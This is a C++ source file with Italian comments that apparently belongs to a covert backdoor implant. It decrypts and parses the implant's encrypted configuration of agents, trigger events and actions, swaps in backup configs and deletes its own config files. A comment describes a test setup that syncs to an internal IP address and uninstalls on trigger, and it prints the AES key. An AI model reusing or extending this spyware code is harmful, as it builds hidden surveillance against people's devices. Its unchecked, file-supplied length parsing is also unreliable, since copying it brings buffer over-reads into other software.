#include <exception>
#include "Conf.h"
#include "Status.h"
#include "Encryption.h"

#define STEP_AND_ASSIGN(p, delta, var) 	p += delta; \
										memcpy(&var, p, sizeof(UINT));

#define ASSIGN_AND_STEP(p, delta, var) 	memcpy(&var, p, sizeof(UINT)); \
										p += delta;

#define STEP(p, delta) 	p += delta;

using namespace std;

Conf::Conf() : wConfName(NULL), wEncryptedConfName(NULL), encryptionObj(NULL) {
	UINT len = 0;

	statusObj = Status::self();
	encryptionObj = new(std::nothrow) Encryption(g_AesKey, KEY_LEN);

	// XXX - I fail delle new dovrebbero lanciare un'eccezione.
	if(encryptionObj == NULL)
		return;

	len = wcslen(g_ConfName);

	wEncryptedConfName = new(std::nothrow) WCHAR[len + 1];

	if(wEncryptedConfName == NULL)
		return;

	ZeroMemory(wEncryptedConfName, (len + 1) * sizeof(WCHAR));
	memcpy(wEncryptedConfName, g_ConfName, len * sizeof(WCHAR));

	wConfName = encryptionObj->DecryptName(wEncryptedConfName, g_AesKey[0]);
}

Conf::~Conf(){
	if(encryptionObj)
		delete encryptionObj;

	if(wConfName)
		free(wConfName);

	if(wEncryptedConfName)
		delete[] wEncryptedConfName;
}

BOOL Conf::ParseAgent(BYTE **pAgent, UINT Num) {
	AgentStruct cfgAgent, *ptr;
	UINT  i;
	BYTE *tmp = NULL;

	ZeroMemory(&cfgAgent, sizeof(AgentStruct));

	// Num = numero di Eventi
	ptr = (pAgentStruct)(*pAgent);
	for(i = 0; i < Num; i++){
		memcpy(&cfgAgent.uAgentId, &ptr->uAgentId, sizeof(UINT));
		memcpy(&cfgAgent.uAgentStatus, &ptr->uAgentStatus, sizeof(UINT));
		memcpy(&cfgAgent.uParamLength, &ptr->uParamLength, sizeof(UINT));
		cfgAgent.pParams = NULL;
		cfgAgent.pFunc = NULL;
		cfgAgent.uCommand = 0;

		if(cfgAgent.uParamLength){
			cfgAgent.pParams = new(std::nothrow) BYTE[cfgAgent.uParamLength];

			if(cfgAgent.pParams == NULL)
				return FALSE;

			// Ci spostiamo sul buffer dati e copiamo la configurazione
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 3);
			memcpy(cfgAgent.pParams, tmp, cfgAgent.uParamLength);
			tmp += cfgAgent.uParamLength; // Puntiamo al prossimo agente/sezione/etc...
		}else{
			// Spostiamo avanti il puntatore della grandezza dei primi tre parametri
			// della struttura
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 3);
		}

		ptr = (pAgentStruct)tmp;
		statusObj->AddAgent(&cfgAgent);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}
	(*pAgent) = (BYTE *)ptr;

	return TRUE;
}

// Dopo gli eventi non esiste una sezione "azioni" perche' nel formato di
// naga le azioni seguono subito gli eventi, percio' dobbiamo richiamare
// direttamente la ParseActions() al ritorno da questa funzione...
BOOL Conf::ParseEvent(BYTE **pEvent, UINT Num) {
	EventStruct cfgEvent, *ptr;
	UINT i;
	BYTE *tmp = NULL;

	ZeroMemory(&cfgEvent, sizeof(EventStruct));

	// Len = numero di Eventi
	ptr = (pEventStruct)(*pEvent);
	for(i = 0; i < Num; i++){
		memcpy(&cfgEvent.uEventType, &ptr->uEventType, sizeof(UINT));
		memcpy(&cfgEvent.uActionId, &ptr->uActionId, sizeof(UINT));
		memcpy(&cfgEvent.uParamLength, &ptr->uParamLength, sizeof(UINT));
		cfgEvent.pParams = NULL;
		cfgEvent.pFunc = NULL;
		cfgEvent.uCommand = 0;
		cfgEvent.uEventStatus = EVENT_STOPPED;

		if(cfgEvent.uParamLength){
			cfgEvent.pParams = new(std::nothrow) BYTE[cfgEvent.uParamLength];

			if(cfgEvent.pParams == NULL)
				return FALSE;

			// Ci spostiamo sul buffer dati e copiamo la configurazione
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 3);
			memcpy(cfgEvent.pParams, tmp, cfgEvent.uParamLength);
			tmp += cfgEvent.uParamLength; // Puntiamo al prossimo agente/sezione/etc...
		}else{
			// Spostiamo avanti il puntatore della grandezza dei primi parametri
			// della struttura
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 3);
		}

		ptr = (pEventStruct)tmp;
		statusObj->AddEvent(&cfgEvent);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}
	(*pEvent) = (BYTE *)ptr;

	return TRUE; // Ora dobbiamo chiamare ParseAction()!!!
}

// Questa funzione passa il puntatore alla struttura che definisce una macro-azione
BOOL Conf::ParseAction(BYTE **pAction, UINT Num) {
	MacroActionStruct cfgAction;
	pActionStruct ptr;
	UINT i, j, dummy;
	BYTE *tmp = NULL;

	ZeroMemory(&cfgAction, sizeof(MacroActionStruct));

	// Len = numero di macro-azioni
	for(i = 0; i < Num; i++){
		// Leggi il numero di sotto-azioni per questa macro-azione
		ASSIGN_AND_STEP(*pAction, sizeof(UINT), cfgAction.uSubActions)
		cfgAction.pActions = new(std::nothrow) ActionStruct[cfgAction.uSubActions];

		if(cfgAction.pActions == NULL)
			return FALSE;

		cfgAction.bTriggered = FALSE;
		// Imposta tutte le sotto-azioni
		ptr = (pActionStruct)(*pAction);
		for(j = 0; j < cfgAction.uSubActions; j++){
			dummy = 0;

			memcpy(&cfgAction.pActions[j].uActionType, &ptr->uActionType, sizeof(UINT));
			memcpy(&cfgAction.pActions[j].uParamLength, &ptr->uParamLength, sizeof(UINT));
			memcpy(&cfgAction.pActions[j].pParams, &dummy, sizeof(UINT));

			if(cfgAction.pActions[j].uParamLength){
				cfgAction.pActions[j].pParams = new(std::nothrow) BYTE[cfgAction.pActions[j].uParamLength];

				// XXX - Andrebbe fatto il cleanup se la new fallisce e sono gia' stati allocati
				// degli elementi
				if(cfgAction.pActions[j].pParams == NULL)
					return FALSE;

				// Ci spostiamo sul buffer dati e copiamo la configurazione
				tmp = (BYTE *)ptr;
				tmp += (sizeof(UINT) * 2);
				memcpy(cfgAction.pActions[j].pParams, tmp, cfgAction.pActions[j].uParamLength);
				tmp += cfgAction.pActions[j].uParamLength; // Puntiamo al prossimo agente/sezione/etc...
			}else{
				// Spostiamo avanti il puntatore della grandezza dei primi parametri
				// della struttura.
				tmp = (BYTE *)ptr;
				tmp += (sizeof(UINT) * 2);
			}

			ptr = (pActionStruct)tmp;

		}
		(*pAction) = (BYTE *)ptr;

		statusObj->AddAction(&cfgAction);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}

	return TRUE;
}

BOOL Conf::ParseConfiguration(BYTE **pConf, UINT Num) {
	ConfStruct cfgConf, *ptr;
	UINT i, dummy;
	BYTE *tmp = NULL;

	ZeroMemory(&cfgConf, sizeof(ConfStruct));

	// Len = numero di parametri di configurazione
	ptr = (pConfStruct)(*pConf);
	for(i = 0; i < Num; i++){
		dummy = 0;

		memcpy(&cfgConf.uConfId, &ptr->uConfId, sizeof(UINT));
		memcpy(&cfgConf.uParamLength, &ptr->uParamLength, sizeof(UINT));
		memcpy(&cfgConf.pParams, &dummy, sizeof(UINT));

		if(cfgConf.uParamLength){
			cfgConf.pParams = new(std::nothrow) BYTE[cfgConf.uParamLength];

			if(cfgConf.pParams == NULL)
				return FALSE;

			// Ci spostiamo sul buffer dati e copiamo la configurazione
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 2);
			memcpy(cfgConf.pParams, tmp, cfgConf.uParamLength);
			tmp += cfgConf.uParamLength; // Puntiamo al prossimo evento/sezione/etc...
		}else{
			// Spostiamo avanti il puntatore della grandezza dei primi parametri
			// della struttura
			tmp = (BYTE *)ptr;
			tmp += (sizeof(UINT) * 2);
		}

		ptr = (pConfStruct)tmp;
		statusObj->AddConf(&cfgConf);

		// Non liberiamo la memoria allocata perche' viene utilizzata da Status
	}
	(*pConf) = (BYTE *)ptr;

	return TRUE;
}

/*
La configurazione di test e' cosi' composta:
Eventi:
0 - on process mspaint.exe
1 - on process calc.exe
2 - timer ogni 3 ore

Azioni:
0 - 
0.1 synca su 192.168.100.179

1 - 
1.1 uninstall
1.2 starta un agente

2 -
2.1 uninstall
2.2 synca
2.3 starta un agente


Agenti:
tre attivi

Chiave aes:
37A6259CC0C1DAE299A7866489DFF0BD
*/

// Questa funzione al termine deve liberare il puntatore ai dati decifrati
BOOL Conf::LoadConf() {
#define EXIT_ON_ERROR(x)	if(x == NULL){ delete[] pConf; return FALSE;}
#define CLEAN_AND_EXIT(x)	delete[] pConf; return x;

	BYTE *pConf = NULL, *pTemp = NULL;
	WCHAR *pBack = NULL;
	UINT Len = 0, i = 0, num = 0;
	BOOL bBackConf = FALSE;

	if(wEncryptedConfName == NULL)
		return FALSE;

	// Vediamo prima se esiste una configurazione di backup valida
	pBack = GetBackupName(FALSE);

	if(pBack) {
		pConf = encryptionObj->DecryptConf(pBack, &Len);
		delete[] pBack;
	}

	// Se non c'e' carichiamo quella di default
	if(pConf == NULL || Len == 0) {
		pConf = encryptionObj->DecryptConf(wEncryptedConfName, &Len);
	} else {
		bBackConf = TRUE; // Significa che dobbiamo spostare la conf di backup
	}

	if(pConf == NULL || Len == 0)
		return FALSE;

	// pConf punta alla prima DWORD del blocco (lunghezza del file),
	// ci spostiamo in modo da puntare al primo byte della configurazione
	pTemp = pConf + 4;

	// Leggi la sezione relativa agli agenti
	pTemp = MemStringCmp(pConf, AGENT_CONF_DELIMITER, Len);
	EXIT_ON_ERROR(pTemp);

	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseAgent(&pTemp, num) == FALSE){
		CLEAN_AND_EXIT(FALSE);
	}

	// Leggi la sezione relativa agli eventi e poi le azioni
	pTemp = MemStringCmp(pConf, EVENT_CONF_DELIMITER, Len);
	EXIT_ON_ERROR(pTemp);

	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseEvent(&pTemp, num) == FALSE){
		CLEAN_AND_EXIT(FALSE);
	}

	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseAction(&pTemp, num) == FALSE){
		CLEAN_AND_EXIT(FALSE);
	}

	// Leggi i parametri di configurazione
	pTemp = MemStringCmp(pConf, MOBIL_CONF_DELIMITER, Len);
	EXIT_ON_ERROR(pTemp);

	ASSIGN_AND_STEP(pTemp, sizeof(UINT), num);
	if(ParseConfiguration(&pTemp, num) == FALSE){
		CLEAN_AND_EXIT(FALSE);
	}

	// Spostiamo la conf di backup
	if(bBackConf) {
		WCHAR *pName = NULL, *pBack = NULL;

		pName = GetCurrentPath(wEncryptedConfName);

		if(pName != NULL) {
			pBack = GetBackupName(TRUE);

			// Meglio essere paranoici
			if(pBack) {
				if(CopyFile(pBack, pName, FALSE) == TRUE) {
					DeleteFile(pBack);
				}
				
				delete[] pBack;
			}

			delete[] pName;
		}
	}

	CLEAN_AND_EXIT(TRUE);
}

// XXX - Da implementare, se mai dovesse servire.
BOOL Conf::WriteConf(pGeneralConf pConf) {
	return FALSE;
}

BOOL Conf::RemoveConf() {
	WCHAR *backdoorPath, *completePath = NULL;

	if(wEncryptedConfName == NULL || wcslen(wEncryptedConfName) == 0)
		return FALSE;

	backdoorPath = GetCurrentPath(NULL);

	if(backdoorPath == NULL)
		return FALSE;

	completePath = new(std::nothrow) WCHAR[wcslen(backdoorPath) + wcslen(wEncryptedConfName) + 1];

	if(completePath == NULL){
		delete[] backdoorPath;
		delete[] completePath;
		return FALSE;
	}

	ZeroMemory(completePath, WideLen(backdoorPath) + WideLen(wEncryptedConfName) + sizeof(WCHAR));
	memcpy(completePath, backdoorPath, WideLen(backdoorPath));
	wcscat_s(completePath, wcslen(backdoorPath) + wcslen(wEncryptedConfName) + 1, wEncryptedConfName);

	BOOL res = DeleteFile(completePath);

	delete[] backdoorPath;
	delete[] completePath;
	
	// Rimuovi anche il file di conf di backup
	completePath = GetBackupName(TRUE);

	if(completePath) {
		DeleteFile(completePath);
		delete[] completePath;
	}

	return res;
}

// XXX - Va implementata! Per il momento scriviamo comunque tutto in maniera
// cifrata e leggiamo solo da file cifrati, per cui questa funzione non serve,
// viene lasciata qui per eventuali utilizzi futuri.
BOOL Conf::FillFile(WCHAR *wName) {
	return TRUE;
}

BYTE* Conf::MemStringCmp(BYTE *memory, CHAR *string, UINT uLen)
{
	BYTE *ptr;
	UINT len = 0;
	ptr = memory;

	for(;;) {
		if (!strcmp((CHAR *)ptr, string))
			return (ptr + strlen(string) + 1);

		ptr++;
		len++;

		if(len > uLen)
			return NULL;
	}
}

WCHAR* Conf::GetBackupName(BOOL bCompletePath) {
	WCHAR *pBackExt = NULL, *pBackName = NULL, *pPath = NULL;

	if(bCompletePath == TRUE) {
		pPath = GetCurrentPath(g_ConfName);
	} else {
		pPath = new(std::nothrow) WCHAR[wcslen(g_ConfName) + 1];
	}

	if(pPath == NULL) {
		return FALSE;
	}

	if(bCompletePath == FALSE) {
		ZeroMemory(pPath, WideLen(g_ConfName) + sizeof(WCHAR));
		memcpy(pPath, g_ConfName, WideLen(g_ConfName));
	}

	pBackExt = encryptionObj->EncryptName(L".bak", g_Challenge[0]);

	if(pBackExt == NULL) {
		return NULL;
	}

	pBackName = new(std::nothrow) WCHAR[wcslen(pPath) + wcslen(pBackExt) + 1];

	if(pBackName == NULL) {
		free(pBackExt);
		return NULL;
	}

	ZeroMemory(pBackName, WideLen(pPath) + WideLen(pBackExt) + sizeof(WCHAR));
	memcpy(pBackName, pPath, WideLen(pPath));
	wcscat_s(pBackName, wcslen(pPath) + wcslen(pBackExt) + 1, pBackExt);

	free(pBackExt);
	delete[] pPath;

	return pBackName;
}